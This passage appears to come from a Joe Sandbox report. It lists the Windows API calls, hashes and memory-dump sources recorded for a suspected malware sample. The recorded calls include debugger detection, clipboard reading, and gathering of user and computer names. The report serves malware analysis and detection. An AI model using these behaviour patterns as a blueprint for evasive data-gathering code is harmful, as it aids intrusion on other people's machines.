                                • Opcode Fuzzy Hash: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
                                • Instruction Fuzzy Hash: 4F31A5B1904245EFDB11DF69DC80469BBB8FF0671171602BFE090972A1D7B49D04DB5A
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorInfoLastLocale$_free$_abort
                                • String ID:
                                • API String ID: 2829624132-0
                                • Opcode ID: c08902af5a4ebae337e65d4f4913ac80c8ce7fcb5dd297238357898b4052817f
                                • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                                • Opcode Fuzzy Hash: c08902af5a4ebae337e65d4f4913ac80c8ce7fcb5dd297238357898b4052817f
                                • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 004399A4
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 264085c365fd56cdaa9a81dec4e023ddb66b25e6f98bc4556e938571cf163858
                                • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                                • Opcode Fuzzy Hash: 264085c365fd56cdaa9a81dec4e023ddb66b25e6f98bc4556e938571cf163858
                                • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                                APIs
                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Context$AcquireRandomRelease
                                • String ID:
                                • API String ID: 1815803762-0
                                • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                                • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                                • ExitProcess.KERNEL32 ref: 004407EF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                                • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                                • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89
                                APIs
                                • OpenClipboard.USER32(00000000), ref: 0040A65D
                                • GetClipboardData.USER32(0000000D), ref: 0040A669
                                • CloseClipboard.USER32 ref: 0040A671
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$CloseDataOpen
                                • String ID:
                                • API String ID: 2058664381-0
                                • Opcode ID: 280dd97dd44c7032fc56be9508286d69cfb3c10e1aaf4890c83757bb65daa123
                                • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                                • Opcode Fuzzy Hash: 280dd97dd44c7032fc56be9508286d69cfb3c10e1aaf4890c83757bb65daa123
                                • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-3916222277
                                • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                                • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                                • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004419DC,?,00000004), ref: 00445E6F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: GetLocaleInfoEx
                                • API String ID: 2299586839-2904428671
                                • Opcode ID: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                • Instruction ID: a9bb3d2992a9d1fe8e60343c55b6d981a628f421e7cf107d295b861f9edee2c3
                                • Opcode Fuzzy Hash: f9893d92672fa9c5b6d787f9f7f2d4c4b9fbd30947df5498ead6f72c32f4f3f0
                                • Instruction Fuzzy Hash: 6DF0F631600708BBDF016F619C05F6E7B51EB14721F10401BFC051A253CA758D109A9D
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNext
                                • String ID:
                                • API String ID: 1690352074-0
                                • Opcode ID: 6b2aab6702fec462d4856447b793dd0eb02a195510c2ec8c521fcd9ef870feb3
                                • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                                • Opcode Fuzzy Hash: 6b2aab6702fec462d4856447b793dd0eb02a195510c2ec8c521fcd9ef870feb3
                                • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                                APIs
                                • GetComputerNameExW.KERNEL32(00000001,?,00000037,00471FFC), ref: 00419615
                                • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Name$ComputerUser
                                • String ID:
                                • API String ID: 4229901323-0
                                • Opcode ID: c3d59dd80c111bba08e9f29d2cdeaf09f0919bffa6c13c010aba229284bd6ddb
                                • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                • Opcode Fuzzy Hash: c3d59dd80c111bba08e9f29d2cdeaf09f0919bffa6c13c010aba229284bd6ddb
                                • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                APIs
                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00450506,?,?,00000008,?,?,004533BD,00000000), ref: 00450738
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExceptionRaise
                                • String ID:
                                • API String ID: 3997070919-0
                                • Opcode ID: 5efd9235541867ec3ed9cd4b3b8e6b094e4fd6c2cbb45d95a394c96c6b6622d2
                                • Instruction ID: 84d157482befc24a690b5ca75d770a61b966f8e925af1348fa8ee8768c6acf08
                                • Opcode Fuzzy Hash: 5efd9235541867ec3ed9cd4b3b8e6b094e4fd6c2cbb45d95a394c96c6b6622d2
                                • Instruction Fuzzy Hash: C4B17B391106089FD714CF28C48AB657BE0FF48365F298659EC99CF2A2C339E996CF44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
                                • Instruction ID: 320eb4b805cbc27e3b43fdc18f554f89df5109ee0a66c35b650df9f3f8f200d4
                                • Opcode Fuzzy Hash: a0300bf0e74490e07b48137b646e8018063fd0ad9baab8b1153cdb7e3f9059d1
                                • Instruction Fuzzy Hash: 031241326083008BD714DF65D852A1EB3E2BFCC758F194D2EF585A73A1DB74E8168B46
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                                • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                                • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001), ref: 0044F1ED
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
                                • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                                • Opcode Fuzzy Hash: 673455fbabca7124b3ca300a5bad4779d617d2069552d52611791679d418f519
                                • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                • Opcode ID: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
                                • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                                • Opcode Fuzzy Hash: e8e40a4c1e4a1452f322ea5d58aa65e712e874c7af3971ed527245fc130c3ff5
                                • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001), ref: 0044F262
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
                                • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                                • Opcode Fuzzy Hash: e9707e75e047b008c80f6bc881a45fe398cc0546891e27ca4c894483a9e1b79d
                                • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                                APIs
                                  • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                                • EnumSystemLocalesW.KERNEL32(Function_000458CE,00000001,0046B680,0000000C), ref: 0044594C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                                • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                                • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • EnumSystemLocalesW.KERNEL32(0044F087,00000001), ref: 0044F167
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                                • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                                • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                                APIs
